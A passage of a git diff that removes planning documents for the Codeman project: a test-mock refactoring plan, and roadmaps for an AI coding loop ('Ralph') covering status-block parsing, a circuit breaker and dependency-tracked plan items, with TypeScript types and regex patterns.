- `createStateTracker()` / `createEventRecorder()` — respawn state tracking
|
||||
- `FAST_TEST_CONFIG` / `AI_ENABLED_TEST_CONFIG` — respawn config presets
|
||||
- `waitForState()` — respawn state machine waiter
|
||||
|
||||
3. **Update imports** in `respawn-test-utils.ts` to re-use shared mocks:
|
||||
```typescript
|
||||
import { MockSession, createMockSession, terminalOutputs } from './mocks/index.js';
|
||||
import { waitForEvent, createDeferred } from './mocks/index.js';
|
||||
export { MockSession, createMockSession, terminalOutputs, waitForEvent, createDeferred };
|
||||
```
|
||||
|
||||
This preserves backward compatibility for any future tests that import from `respawn-test-utils.ts` directly while eliminating the duplication.
|
||||
|
||||
### Verification
|
||||
|
||||
```bash
|
||||
tsc --noEmit
|
||||
npx vitest run test/respawn-controller.test.ts
|
||||
npx vitest run test/respawn-team-awareness.test.ts
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## What is NOT in scope (and why)
|
||||
|
||||
### Migrating `session-manager.test.ts` and `ralph-loop.test.ts` mocks
|
||||
|
||||
Both files define mocks inside `vi.mock()` factories that replace entire modules:
|
||||
|
||||
```typescript
|
||||
// session-manager.test.ts — mock replaces ../src/session.js
|
||||
vi.mock('../src/session.js', () => {
|
||||
class MockSession extends EventEmitter { ... }
|
||||
return { Session: MockSession };
|
||||
});
|
||||
|
||||
// ralph-loop.test.ts — mock replaces ../src/state-store.js
|
||||
vi.mock('../src/state-store.js', () => {
|
||||
class MockStateStore { ... }
|
||||
return { getStore: vi.fn(() => instance), StateStore: MockStateStore };
|
||||
});
|
||||
```
|
||||
|
||||
These are fundamentally different from the direct-instantiation pattern:
|
||||
- The `vi.mock()` factory runs in an isolated scope — outer imports are not available
|
||||
- The mock class must be returned with the exact export names (`Session`, `getStore`, `StateStore`)
|
||||
- The `session-manager.test.ts` MockSession auto-registers into a shared `mockState.sessions` Map (tight coupling with test setup)
|
||||
|
||||
Migrating would require `vi.hoisted()` to share the class between factory and test scope, plus restructuring the test's module-mocking setup. This is high-complexity, high-risk refactoring with limited benefit since these tests already work. The shared `MockStateStore` in `test/mocks/` is available for **new** tests (like route tests) that use direct instantiation instead.
|
||||
|
||||
### Full integration tests with real Fastify server
|
||||
|
||||
Route tests use `app.inject()` which simulates HTTP without opening ports. Full integration tests that spin up `WebServer`, create real sessions, and stream SSE would be valuable but are a separate effort requiring:
|
||||
- A test WebServer factory
|
||||
- Session lifecycle management in tests
|
||||
- SSE client test utilities
|
||||
- Significantly more setup/teardown complexity
|
||||
|
||||
### Testing auth middleware in route tests
|
||||
|
||||
Route tests bypass authentication (no auth middleware registered on the test Fastify instance). Auth middleware has its own dedicated tests in `auth-security.test.ts` and `qr-auth.test.ts`. Testing auth + routes together is a future integration test concern.
|
||||
|
||||
### Testing SSE event streaming
|
||||
|
||||
SSE integration requires a running server with `EventSource` client. This is significantly more complex than `app.inject()` tests and is deferred. The existing `sse-events.test.ts` covers SSE patterns.
|
||||
|
||||
### Complete route coverage for all 12 modules
|
||||
|
||||
This phase covers the 3 highest-value route modules (session, system, respawn — 98 of 162 handlers). The remaining 9 modules (ralph, plan, push, team, mux, file, scheduled, hook-event, case) should be added incrementally in follow-up work.
|
||||
|
||||
---
|
||||
|
||||
## Summary
|
||||
|
||||
| Metric | Before | After |
|
||||
|--------|--------|-------|
|
||||
| MockSession definitions | 4 (across 4 files) | 1 shared (2 vi.mock() copies remain, intentionally) |
|
||||
| MockStateStore definitions | 2 (across 2 files) | 1 shared (2 vi.mock() copies remain, intentionally) |
|
||||
| Files importing from `respawn-test-utils.ts` | 0 | Utilities split into `test/mocks/` |
|
||||
| Route test files | 0 | 3 (session, system, respawn) |
|
||||
| Route handlers with dedicated tests | 0 | ~30 (highest-priority endpoints) |
|
||||
| Shared mock directory | None | `test/mocks/` with 5 files + barrel |
|
||||
|
||||
### Final verification checklist
|
||||
|
||||
```bash
|
||||
# Type checking
|
||||
tsc --noEmit
|
||||
|
||||
# Linting
|
||||
npm run lint
|
||||
|
||||
# Formatting
|
||||
npm run format:check
|
||||
|
||||
# Run all affected tests individually
|
||||
npx vitest run test/respawn-controller.test.ts
|
||||
npx vitest run test/respawn-team-awareness.test.ts
|
||||
npx vitest run test/routes/session-routes.test.ts
|
||||
npx vitest run test/routes/system-routes.test.ts
|
||||
npx vitest run test/routes/respawn-routes.test.ts
|
||||
|
||||
# Verify unchanged tests still pass
|
||||
npx vitest run test/session-manager.test.ts
|
||||
npx vitest run test/ralph-loop.test.ts
|
||||
|
||||
# Dev server still starts
|
||||
npx tsx src/index.ts web --port 3099 &
|
||||
curl -s http://localhost:3099/api/status | jq .status # "ok"
|
||||
kill %1
|
||||
```
|
||||
@@ -1,247 +0,0 @@
|
||||
# Ralph Loop Plan Improvement Roadmap
|
||||
|
||||
> Research-backed improvements for rock-solid AI planning with auto-improvement capabilities.
|
||||
|
||||
**Created**: 2026-01-27
|
||||
**Status**: Implementation in Progress
|
||||
|
||||
---
|
||||
|
||||
## Table of Contents
|
||||
|
||||
1. [Research Summary](#research-summary)
|
||||
2. [Current State Analysis](#current-state-analysis)
|
||||
3. [Proposed Improvements](#proposed-improvements)
|
||||
4. [Implementation Plan](#implementation-plan)
|
||||
5. [Sources](#sources)
|
||||
|
||||
---
|
||||
|
||||
## Research Summary
|
||||
|
||||
### Key Insights from Industry Best Practices
|
||||
|
||||
#### 1. Self-Verification is Critical
|
||||
> "Claude performs dramatically better when it can verify its own work, like run tests, compare screenshots, and validate outputs. Without clear success criteria, it might produce something that looks right but actually doesn't work."
|
||||
> — [Anthropic Best Practices](https://www.anthropic.com/engineering/claude-code-best-practices)
|
||||
|
||||
#### 2. Iterative Refinement Patterns (AWS)
|
||||
> "A generator agent produces output, an evaluator agent reviews using evaluation rubric, and based on feedback, an optimizer agent revises the output. Loop repeats until criteria met."
|
||||
> — [AWS Agentic AI Patterns](https://docs.aws.amazon.com/prescriptive-guidance/latest/agentic-ai-patterns/evaluator-reflect-refine-loop-patterns.html)
|
||||
|
||||
#### 3. Dynamic Task Decomposition (TDAG Framework)
|
||||
> "Dynamically decomposes complex tasks into smaller subtasks and assigns each to a specifically generated subagent, enhancing adaptability in diverse and unpredictable real-world tasks."
|
||||
> — [TDAG Framework - arXiv](https://arxiv.org/abs/2402.10178)
|
||||
|
||||
#### 4. Multi-Stage Verification Workflow
|
||||
> "o3: Generate plan → Sonnet: Verify and create task list → Sonnet: Execute → Sonnet: Verify against plan → o3: Final verification → Issues bake back into plan"
|
||||
> — [Claude Code Best Practices Community](https://rosmur.github.io/claudecode-best-practices/)
|
||||
|
||||
#### 5. Self-Improving Agents
|
||||
> "Through an iterative refinement process (analyze outcome → adjust approach → try again), the agent becomes more adept at handling tasks over time. It effectively builds a growing knowledge base of what strategies work best."
|
||||
> — [Self-Improving Data Agents](https://powerdrill.ai/blog/self-improving-data-agents)
|
||||
|
||||
#### 6. Memory Architecture for Planning
|
||||
> "Agents use three memory layers: working memory for short-lived calculations, episodic memory for step-by-step histories, and semantic memory for long-term knowledge."
|
||||
> — [LLM Agent Research](https://www.promptingguide.ai/research/llm-agents)
|
||||
|
||||
---
|
||||
|
||||
## Current State Analysis
|
||||
|
||||
### What We Have
|
||||
|
||||
The current plan generation system (`/api/generate-plan` and `/api/generate-plan-detailed`):
|
||||
|
||||
1. **Standard Mode**: Single Opus 4.5 call with TDD-focused prompt
|
||||
2. **Enhanced Mode**: 4 parallel subagents (Requirements, Architecture, Testing, Risks) + Verification
|
||||
|
||||
### Current Plan Item Structure
|
||||
|
||||
```json
|
||||
{
|
||||
"content": "Implement login endpoint",
|
||||
"priority": "P0"
|
||||
}
|
||||
```
|
||||
|
||||
### Limitations
|
||||
|
||||
| Issue | Impact |
|
||||
|-------|--------|
|
||||
| No verification criteria | Can't automatically validate completion |
|
||||
| No test pairing | TDD not enforced structurally |
|
||||
| Static plans | No adaptation during execution |
|
||||
| No dependencies | Can't track blocking relationships |
|
||||
| No failure tracking | Same errors repeat |
|
||||
| No checkpoints | Plans run until completion or failure |
|
||||
|
||||
---
|
||||
|
||||
## Proposed Improvements
|
||||
|
||||
### Enhanced Plan Item Structure
|
||||
|
||||
```typescript
|
||||
interface EnhancedPlanItem {
|
||||
id: string; // Unique identifier (e.g., "P0-001")
|
||||
content: string; // Task description
|
||||
priority: 'P0' | 'P1' | 'P2'; // Criticality
|
||||
phase: 'setup' | 'test' | 'impl' | 'verify'; // Development phase
|
||||
|
||||
// NEW: Verification
|
||||
verificationCriteria: string; // How to know it's done
|
||||
testCommand?: string; // Command to run for verification
|
||||
|
||||
// NEW: Dependencies
|
||||
dependencies: string[]; // IDs of tasks that must complete first
|
||||
blockedBy?: string[]; // Runtime: tasks blocking this one
|
||||
|
||||
// NEW: Execution tracking
|
||||
status: 'pending' | 'in_progress' | 'completed' | 'failed' | 'blocked';
|
||||
attempts: number; // How many times attempted
|
||||
lastError?: string; // Most recent failure reason
|
||||
completedAt?: number; // Timestamp of completion
|
||||
|
||||
// NEW: Metadata
|
||||
estimatedComplexity: 'low' | 'medium' | 'high';
|
||||
rollbackStrategy?: string; // How to undo if needed
|
||||
version: number; // Plan version this belongs to
|
||||
}
|
||||
```
|
||||
|
||||
### Runtime Plan Adaptation Flow
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ RUNTIME PLAN LOOP │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ │
|
||||
│ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐ │
|
||||
│ │ Execute │──▶│ Verify │──▶│ Success? │──▶│ Mark │ │
|
||||
│ │ Task │ │ Output │ │ │ │ Complete │ │
|
||||
│ └──────────┘ └──────────┘ └────┬─────┘ └──────────┘ │
|
||||
│ │ No │
|
||||
│ ▼ │
|
||||
│ ┌──────────┐ │
|
||||
│ │ Analyze │ │
|
||||
│ │ Failure │ │
|
||||
│ └────┬─────┘ │
|
||||
│ │ │
|
||||
│ ┌──────────────┼──────────────┐ │
|
||||
│ ▼ ▼ ▼ │
|
||||
│ ┌──────────┐ ┌──────────┐ ┌──────────┐ │
|
||||
│ │ Retry │ │ Add Fix │ │ Escalate │ │
|
||||
│ │ (< 3x) │ │ Sub-Task │ │ BLOCKED │ │
|
||||
│ └──────────┘ └──────────┘ └──────────┘ │
|
||||
│ │
|
||||
└───────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
### Checkpoint Review System
|
||||
|
||||
At iterations 5, 10, 20, 30, 50:
|
||||
1. Pause execution
|
||||
2. Summarize progress (completed/failed/pending)
|
||||
3. Identify stuck items (3+ failures)
|
||||
4. Generate alternative approaches for stuck items
|
||||
5. Update plan with new strategies
|
||||
6. Continue with refined plan
|
||||
|
||||
---
|
||||
|
||||
## Implementation Plan
|
||||
|
||||
### Phase 1: Quick Wins (Implementing Now)
|
||||
|
||||
#### 1.1 Add Verification Criteria to Plan Items
|
||||
- Modify plan generation prompts to require `verificationCriteria`
|
||||
- Update `PlanItem` interface in `types.ts`
|
||||
- Update plan orchestrator prompts
|
||||
|
||||
#### 1.2 Pair Test/Implementation Steps
|
||||
- Ensure every implementation step has a corresponding test step
|
||||
- Group items: test → implement → verify
|
||||
- Add phase field to track TDD cycle
|
||||
|
||||
#### 1.3 Checkpoint Review Prompts
|
||||
- Add checkpoint logic to Ralph tracker
|
||||
- At iterations 5, 10, 20: inject review prompt
|
||||
- Generate progress summary and stuck item analysis
|
||||
|
||||
### Phase 2: Medium Effort (Implementing Now)
|
||||
|
||||
#### 2.1 Failure Tracking
|
||||
- Track `attempts` and `lastError` per task
|
||||
- After 3 failures, auto-generate debug sub-task
|
||||
- Record failure patterns in plan history
|
||||
|
||||
#### 2.2 Plan Versioning
|
||||
- Add `version` field to plans
|
||||
- Keep history in `@fix_plan.md` with version markers
|
||||
- Allow rollback to previous versions
|
||||
- Track which version each task belongs to
|
||||
|
||||
#### 2.3 Dependency Tracking
|
||||
- Add `dependencies` field to plan items
|
||||
- Validate dependency graph (no cycles)
|
||||
- Block tasks until dependencies complete
|
||||
- Show dependency status in UI
|
||||
|
||||
### Phase 3: Future Enhancements
|
||||
|
||||
#### 3.1 Full Runtime Adaptation
|
||||
- TDAG-style dynamic decomposition
|
||||
- Auto-generate sub-tasks for complex items
|
||||
- Learning from failure patterns
|
||||
|
||||
#### 3.2 Multi-Model Verification
|
||||
- Haiku: Fast initial generation
|
||||
- Sonnet: Verification and refinement
|
||||
- Opus: Final quality check
|
||||
|
||||
#### 3.3 Plan Memory System
|
||||
- Episodic memory: What worked/failed in this session
|
||||
- Semantic memory: Patterns across projects
|
||||
- Use for future plan generation
|
||||
|
||||
---
|
||||
|
||||
## File Changes Required
|
||||
|
||||
### New/Modified Files
|
||||
|
||||
| File | Changes |
|
||||
|------|---------|
|
||||
| `src/types.ts` | Add `EnhancedPlanItem` interface |
|
||||
| `src/plan-orchestrator.ts` | Update prompts, add versioning |
|
||||
| `src/ralph-tracker.ts` | Add checkpoint logic, failure tracking |
|
||||
| `src/web/server.ts` | New endpoints for plan updates |
|
||||
| `src/web/public/app.js` | UI for enhanced plan display |
|
||||
|
||||
### New Endpoints
|
||||
|
||||
| Method | Endpoint | Purpose |
|
||||
|--------|----------|---------|
|
||||
| PATCH | `/api/sessions/:id/plan/task/:taskId` | Update task status |
|
||||
| POST | `/api/sessions/:id/plan/checkpoint` | Trigger checkpoint review |
|
||||
| GET | `/api/sessions/:id/plan/history` | Get plan version history |
|
||||
| POST | `/api/sessions/:id/plan/rollback/:version` | Rollback to version |
|
||||
|
||||
---
|
||||
|
||||
## Sources
|
||||
|
||||
- [Anthropic Claude Code Best Practices](https://www.anthropic.com/engineering/claude-code-best-practices)
|
||||
- [AWS Agentic AI Patterns](https://docs.aws.amazon.com/prescriptive-guidance/latest/agentic-ai-patterns/evaluator-reflect-refine-loop-patterns.html)
|
||||
- [TDAG: Multi-Agent Task Decomposition Framework](https://arxiv.org/abs/2402.10178)
|
||||
- [Self-Improving Data Agents](https://powerdrill.ai/blog/self-improving-data-agents)
|
||||
- [OpenAI Self-Evolving Agents Cookbook](https://cookbook.openai.com/examples/partners/self_evolving_agents/autonomous_agent_retraining)
|
||||
- [Task Decomposition for Coding Agents](https://mgx.dev/insights/task-decomposition-for-coding-agents-architectures-advancements-and-future-directions/)
|
||||
- [Claude Code Best Practices Community Guide](https://rosmur.github.io/claudecode-best-practices/)
|
||||
- [LLM Agents Prompt Engineering Guide](https://www.promptingguide.ai/research/llm-agents)
|
||||
- [Agentic AI Implementation Guide](https://www.sketchdev.io/blog/agentic-ai-implementation-guide)
|
||||
|
||||
---
|
||||
|
||||
*This document is part of the Codeman project. See [CLAUDE.md](../CLAUDE.md) for main documentation.*
|
||||
@@ -1,251 +0,0 @@
|
||||
# Ralph Loop Improvements Plan
|
||||
|
||||
## Overview
|
||||
|
||||
This plan details improvements to Codeman's Ralph Loop system based on best practices from the Ralph Claude Code repository (https://github.com/frankbria/ralph-claude-code).
|
||||
|
||||
## Key Concepts to Implement
|
||||
|
||||
### RALPH_STATUS Block Format
|
||||
|
||||
Claude outputs this structured block at the end of every response for better tracking:
|
||||
|
||||
```
|
||||
---RALPH_STATUS---
|
||||
STATUS: IN_PROGRESS | COMPLETE | BLOCKED
|
||||
TASKS_COMPLETED_THIS_LOOP: <number>
|
||||
FILES_MODIFIED: <number>
|
||||
TESTS_STATUS: PASSING | FAILING | NOT_RUN
|
||||
WORK_TYPE: IMPLEMENTATION | TESTING | DOCUMENTATION | REFACTORING
|
||||
EXIT_SIGNAL: false | true
|
||||
RECOMMENDATION: <one line summary of what to do next>
|
||||
---END_RALPH_STATUS---
|
||||
```
|
||||
|
||||
### Dual-Condition Exit Gate
|
||||
|
||||
Exit requires BOTH conditions:
|
||||
1. `completion_indicators >= 2` (heuristic detection from natural language patterns)
|
||||
2. Claude's explicit `EXIT_SIGNAL: true` in the RALPH_STATUS block
|
||||
|
||||
### Circuit Breaker Pattern
|
||||
|
||||
Three states: CLOSED → HALF_OPEN → OPEN
|
||||
|
||||
| From State | Condition | To State |
|
||||
|------------|-----------|----------|
|
||||
| CLOSED | consecutive_no_progress >= 2 | HALF_OPEN |
|
||||
| CLOSED | consecutive_no_progress >= 3 | OPEN |
|
||||
| CLOSED | consecutive_same_error >= 5 | OPEN |
|
||||
| HALF_OPEN | progress detected | CLOSED |
|
||||
| HALF_OPEN | consecutive_no_progress >= 3 | OPEN |
|
||||
| OPEN | Manual reset | CLOSED |
|
||||
|
||||
### @fix_plan.md Structure
|
||||
|
||||
```markdown
|
||||
# Fix Plan
|
||||
|
||||
## High Priority (P0)
|
||||
- [ ] Critical: Fix authentication bug
|
||||
- [ ] Blocker: Database connection timeout
|
||||
|
||||
## Standard (P1)
|
||||
- [ ] Feature: Add user profile page
|
||||
|
||||
## Nice to Have (P2)
|
||||
- [ ] Improvement: Add dark mode
|
||||
|
||||
## Completed
|
||||
- [x] Setup: Initialize project structure
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Phase 1: Quick Wins (1-2 days)
|
||||
|
||||
### 1.1 RALPH_STATUS Block Parsing
|
||||
|
||||
**What**: Add parsing support for the structured RALPH_STATUS block format in RalphTracker.
|
||||
|
||||
**Implementation**:
|
||||
- Add regex pattern to detect `---RALPH_STATUS---` blocks
|
||||
- Parse fields: STATUS, TASKS_COMPLETED_THIS_LOOP, FILES_MODIFIED, TESTS_STATUS, WORK_TYPE, EXIT_SIGNAL, RECOMMENDATION
|
||||
- Store in extended `RalphTrackerState` type
|
||||
- Emit new events: `ralphStatusUpdate`
|
||||
|
||||
**Files**: `ralph-tracker.ts`, `types.ts`
|
||||
|
||||
### 1.2 Enhanced Status Display in UI
|
||||
|
||||
**What**: Display RALPH_STATUS fields in the Ralph State Panel.
|
||||
|
||||
**Implementation**:
|
||||
- Add UI elements: WORK_TYPE indicator, TESTS_STATUS badge, FILES_MODIFIED count
|
||||
- Show RECOMMENDATION text in expanded view
|
||||
- Color-code status (IN_PROGRESS=blue, COMPLETE=green, BLOCKED=red)
|
||||
|
||||
**Files**: `app.js`, `styles.css`, `index.html`
|
||||
|
||||
### 1.3 Prompt Template Improvements
|
||||
|
||||
**What**: Add specification-by-example exit scenarios to prompts.
|
||||
|
||||
**Implementation**:
|
||||
- Add "Exit Scenarios" section to case-template.md
|
||||
- Document when to continue vs. when to output completion
|
||||
- Include testing limits guidance (max 20% effort on tests)
|
||||
- Add RALPH_STATUS block instructions
|
||||
|
||||
**Files**: `case-template.md`
|
||||
|
||||
### 1.4 Better Wizard Validation
|
||||
|
||||
**What**: Add client-side validation and helpful warnings.
|
||||
|
||||
**Implementation**:
|
||||
- Warn if task description < 50 chars
|
||||
- Warn if no success criteria mentioned
|
||||
- Suggest adding test requirements if none detected
|
||||
- Validate completion phrase is uppercase alphanumeric
|
||||
|
||||
**Files**: `app.js`
|
||||
|
||||
---
|
||||
|
||||
## Phase 2: Core Improvements (3-5 days)
|
||||
|
||||
### 2.1 Circuit Breaker Pattern
|
||||
|
||||
**What**: Implement three-state circuit breaker to detect stuck loops.
|
||||
|
||||
**Implementation**:
|
||||
- Create `CircuitBreaker` class with CLOSED, HALF_OPEN, OPEN states
|
||||
- Track: files_modified, tasks_completed, error_patterns per iteration
|
||||
- Triggers: N consecutive no-progress, same error M times, tests failing K iterations
|
||||
- Emit events: `circuitBreakerStateChange`
|
||||
|
||||
**Files**: New `circuit-breaker.ts`, integrate into `ralph-tracker.ts`
|
||||
|
||||
### 2.2 Circuit Breaker UI
|
||||
|
||||
**What**: Visual indicator in Ralph panel.
|
||||
|
||||
**Implementation**:
|
||||
- Badge: green (CLOSED), yellow (HALF_OPEN), red (OPEN)
|
||||
- Warning before tripping
|
||||
- Notification when circuit opens
|
||||
- Manual reset button
|
||||
|
||||
**Files**: `app.js`, `styles.css`, `index.html`
|
||||
|
||||
### 2.3 @fix_plan.md Integration
|
||||
|
||||
**What**: Generate and track structured task plan file.
|
||||
|
||||
**Implementation**:
|
||||
- Generate `@fix_plan.md` in working directory when loop starts
|
||||
- Watch file for changes and sync with RalphTracker todos
|
||||
- Parse priority levels (P0, P1, P2)
|
||||
- Show priority in UI
|
||||
|
||||
**Files**: New `fix-plan.ts`, `ralph-tracker.ts`, `server.ts`
|
||||
|
||||
### 2.4 Wizard Plan Generation Step
|
||||
|
||||
**What**: Add third wizard step for AI-assisted plan generation.
|
||||
|
||||
**Implementation**:
|
||||
- Step 2: "Plan Generation" between Task Setup and Launch
|
||||
- Use Claude to break down task into fix plan items
|
||||
- Allow edit/reorder before launch
|
||||
- Generate @fix_plan.md with selected items
|
||||
|
||||
**Files**: `app.js`, `index.html`, `server.ts`
|
||||
|
||||
### 2.5 Smart Respawn Integration
|
||||
|
||||
**What**: Use RALPH_STATUS for respawn decisions.
|
||||
|
||||
**Implementation**:
|
||||
- Use EXIT_SIGNAL field for respawn decisions
|
||||
- If STATUS=BLOCKED, trigger circuit breaker instead of respawn
|
||||
- Pass RECOMMENDATION to respawn update prompt
|
||||
|
||||
**Files**: `respawn-controller.ts`, `ralph-tracker.ts`
|
||||
|
||||
---
|
||||
|
||||
## Phase 3: Advanced Features (5+ days)
|
||||
|
||||
### 3.1 Template Library
|
||||
- Bug Fix, Feature, Refactoring, Test Coverage, Documentation templates
|
||||
- Template selector in wizard
|
||||
- Custom templates in `~/.codeman/templates/`
|
||||
|
||||
### 3.2 Tool Permissions
|
||||
- Configure allowed Claude tools per loop
|
||||
- Generate hook configuration
|
||||
- Store in session config
|
||||
|
||||
### 3.3 Per-Iteration Timeout
|
||||
- Max time per iteration (5-60 min)
|
||||
- Auto-continue on timeout
|
||||
- Log timeout events
|
||||
|
||||
### 3.4 Rate Limiting
|
||||
- Max tokens per iteration
|
||||
- Max API calls per minute
|
||||
- Cooldown between iterations
|
||||
|
||||
### 3.5 Metrics Dashboard
|
||||
- Time-series charts (files modified, tasks completed, tokens)
|
||||
- Aggregate statistics
|
||||
- Export to JSON/CSV
|
||||
|
||||
---
|
||||
|
||||
## Priority Matrix
|
||||
|
||||
| Item | Effort | Impact | Priority |
|
||||
|------|--------|--------|----------|
|
||||
| 1.1 RALPH_STATUS Parsing | Low | High | P0 |
|
||||
| 1.2 Status Display UI | Low | Medium | P0 |
|
||||
| 1.3 Prompt Templates | Low | High | P0 |
|
||||
| 1.4 Wizard Validation | Low | Medium | P1 |
|
||||
| 2.1 Circuit Breaker | Medium | High | P1 |
|
||||
| 2.2 Circuit Breaker UI | Medium | Medium | P1 |
|
||||
| 2.3 Fix Plan Integration | Medium | High | P1 |
|
||||
| 2.4 Plan Generation Step | Medium | Medium | P2 |
|
||||
| 2.5 Respawn Integration | Medium | High | P1 |
|
||||
| 3.1 Template Selection | High | Medium | P2 |
|
||||
| 3.2 Tool Permissions | High | Medium | P3 |
|
||||
| 3.3 Per-Iteration Timeout | High | Medium | P2 |
|
||||
| 3.4 Rate Limiting | High | Low | P3 |
|
||||
| 3.5 Metrics Dashboard | High | Medium | P3 |
|
||||
|
||||
---
|
||||
|
||||
## Reference: Ralph Claude Code Best Practices
|
||||
|
||||
### Testing Guidelines
|
||||
- LIMIT testing to ~20% of total effort per loop
|
||||
- PRIORITIZE: Implementation > Documentation > Tests
|
||||
- Only write tests for NEW functionality
|
||||
- Do NOT refactor existing tests unless broken
|
||||
|
||||
### What NOT to Do
|
||||
- Do NOT continue with busy work when EXIT_SIGNAL should be true
|
||||
- Do NOT run tests repeatedly without implementing new features
|
||||
- Do NOT refactor code that is already working
|
||||
- Do NOT add features not in specifications
|
||||
- Do NOT forget the status block
|
||||
|
||||
### Exit Scenarios (Specification by Example)
|
||||
|
||||
1. **Successful Completion**: All tasks done → EXIT_SIGNAL=true
|
||||
2. **Test-Only Loop**: No implementation, only testing → continue but warn
|
||||
3. **Stuck on Error**: Same error 5 times → circuit breaker opens
|
||||
4. **No Work Remaining**: All specs done → EXIT_SIGNAL=true
|
||||
5. **Making Progress**: Normal flow → continue
|
||||
6. **Blocked**: Needs human intervention → STATUS=BLOCKED
|
||||
@@ -1,434 +0,0 @@
|
||||
# Ralph Tracker Phase 1 Implementation Plan
|
||||
|
||||
## Overview
|
||||
|
||||
This plan details how to enhance the existing RalphTracker with RALPH_STATUS block parsing, circuit breaker pattern, and dual-condition exit gate.
|
||||
|
||||
---
|
||||
|
||||
## 1. Current State Analysis
|
||||
|
||||
### What RalphTracker Already Does Well
|
||||
|
||||
- **Todo Detection**: Supports 5 formats (checkboxes, indicators, status in parentheses, native TodoWrite, checkmark-based)
|
||||
- **Completion Phrases**: Detects `<promise>PHRASE</promise>` with occurrence-based logic (1st = store, 2nd = complete)
|
||||
- **Loop State Tracking**: Tracks active/inactive, iteration counts, max iterations, elapsed hours, cycle counts
|
||||
- **Auto-Enable**: Disabled by default, auto-enables when Ralph patterns detected
|
||||
- **Event System**: Emits `loopUpdate`, `todoUpdate`, `completionDetected`, `enabled` events
|
||||
- **SSE Integration**: Events forwarded via `session:ralphLoopUpdate`, `session:ralphTodoUpdate`, `session:ralphCompletionDetected`
|
||||
- **Debouncing**: EVENT_DEBOUNCE_MS (50ms) for rapid updates to prevent UI jitter
|
||||
- **Cleanup**: MAX_TODO_ITEMS (50), TODO_EXPIRY_MS (1 hour), throttled cleanup
|
||||
|
||||
### Current Limitations
|
||||
|
||||
| Feature | Status |
|
||||
|---------|--------|
|
||||
| RALPH_STATUS block parsing | Missing |
|
||||
| Circuit breaker pattern | Missing |
|
||||
| Priority-based todos (P0/P1/P2) | Missing |
|
||||
| Dual-condition exit gate | Missing |
|
||||
| Files modified tracking | Missing |
|
||||
| Tests status tracking | Missing |
|
||||
| Work type classification | Missing |
|
||||
|
||||
---
|
||||
|
||||
## 2. New Type Definitions (types.ts)
|
||||
|
||||
```typescript
|
||||
// ========== RALPH_STATUS Block Types ==========
|
||||
|
||||
export type RalphStatusValue = 'IN_PROGRESS' | 'COMPLETE' | 'BLOCKED';
|
||||
export type RalphTestsStatus = 'PASSING' | 'FAILING' | 'NOT_RUN';
|
||||
export type RalphWorkType = 'IMPLEMENTATION' | 'TESTING' | 'DOCUMENTATION' | 'REFACTORING';
|
||||
|
||||
/**
|
||||
* Parsed RALPH_STATUS block from Claude output.
|
||||
*/
|
||||
export interface RalphStatusBlock {
|
||||
status: RalphStatusValue;
|
||||
tasksCompletedThisLoop: number;
|
||||
filesModified: number;
|
||||
testsStatus: RalphTestsStatus;
|
||||
workType: RalphWorkType;
|
||||
exitSignal: boolean;
|
||||
recommendation: string;
|
||||
parsedAt: number;
|
||||
}
|
||||
|
||||
// ========== Circuit Breaker Types ==========
|
||||
|
||||
export type CircuitBreakerState = 'CLOSED' | 'HALF_OPEN' | 'OPEN';
|
||||
|
||||
export type CircuitBreakerReason =
|
||||
| 'normal_operation'
|
||||
| 'no_progress_warning'
|
||||
| 'no_progress_open'
|
||||
| 'same_error_repeated'
|
||||
| 'tests_failing_too_long'
|
||||
| 'progress_detected'
|
||||
| 'manual_reset';
|
||||
|
||||
export interface CircuitBreakerStatus {
|
||||
state: CircuitBreakerState;
|
||||
consecutiveNoProgress: number;
|
||||
consecutiveSameError: number;
|
||||
consecutiveTestsFailure: number;
|
||||
lastProgressIteration: number;
|
||||
reason: string;
|
||||
reasonCode: CircuitBreakerReason;
|
||||
lastTransitionAt: number;
|
||||
lastErrorMessage: string | null;
|
||||
}
|
||||
|
||||
// ========== Priority Todo Types ==========
|
||||
|
||||
export type RalphTodoPriority = 'P0' | 'P1' | 'P2' | null;
|
||||
|
||||
// ========== Helper Functions ==========
|
||||
|
||||
export function createInitialCircuitBreakerStatus(): CircuitBreakerStatus {
|
||||
return {
|
||||
state: 'CLOSED',
|
||||
consecutiveNoProgress: 0,
|
||||
consecutiveSameError: 0,
|
||||
consecutiveTestsFailure: 0,
|
||||
lastProgressIteration: 0,
|
||||
reason: 'Initial state',
|
||||
reasonCode: 'normal_operation',
|
||||
lastTransitionAt: Date.now(),
|
||||
lastErrorMessage: null,
|
||||
};
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 3. New Regex Patterns (ralph-tracker.ts)
|
||||
|
||||
```typescript
|
||||
// ---------- RALPH_STATUS Block Patterns ----------
|
||||
|
||||
const RALPH_STATUS_START_PATTERN = /^---RALPH_STATUS---\s*$/;
|
||||
const RALPH_STATUS_END_PATTERN = /^---END_RALPH_STATUS---\s*$/;
|
||||
const RALPH_STATUS_FIELD_PATTERN = /^STATUS:\s*(IN_PROGRESS|COMPLETE|BLOCKED)\s*$/i;
|
||||
const RALPH_TASKS_COMPLETED_PATTERN = /^TASKS_COMPLETED_THIS_LOOP:\s*(\d+)\s*$/i;
|
||||
const RALPH_FILES_MODIFIED_PATTERN = /^FILES_MODIFIED:\s*(\d+)\s*$/i;
|
||||
const RALPH_TESTS_STATUS_PATTERN = /^TESTS_STATUS:\s*(PASSING|FAILING|NOT_RUN)\s*$/i;
|
||||
const RALPH_WORK_TYPE_PATTERN = /^WORK_TYPE:\s*(IMPLEMENTATION|TESTING|DOCUMENTATION|REFACTORING)\s*$/i;
|
||||
const RALPH_EXIT_SIGNAL_PATTERN = /^EXIT_SIGNAL:\s*(true|false)\s*$/i;
|
||||
const RALPH_RECOMMENDATION_PATTERN = /^RECOMMENDATION:\s*(.+)$/i;
|
||||
|
||||
// ---------- Completion Indicator Patterns ----------
|
||||
|
||||
const COMPLETION_INDICATOR_PATTERNS = [
|
||||
/all\s+(?:tasks?|items?|work)\s+(?:are\s+)?(?:completed?|done|finished)/i,
|
||||
/(?:completed?|finished)\s+all\s+(?:tasks?|items?|work)/i,
|
||||
/nothing\s+(?:left|remaining)\s+to\s+do/i,
|
||||
/no\s+more\s+(?:tasks?|items?|work)/i,
|
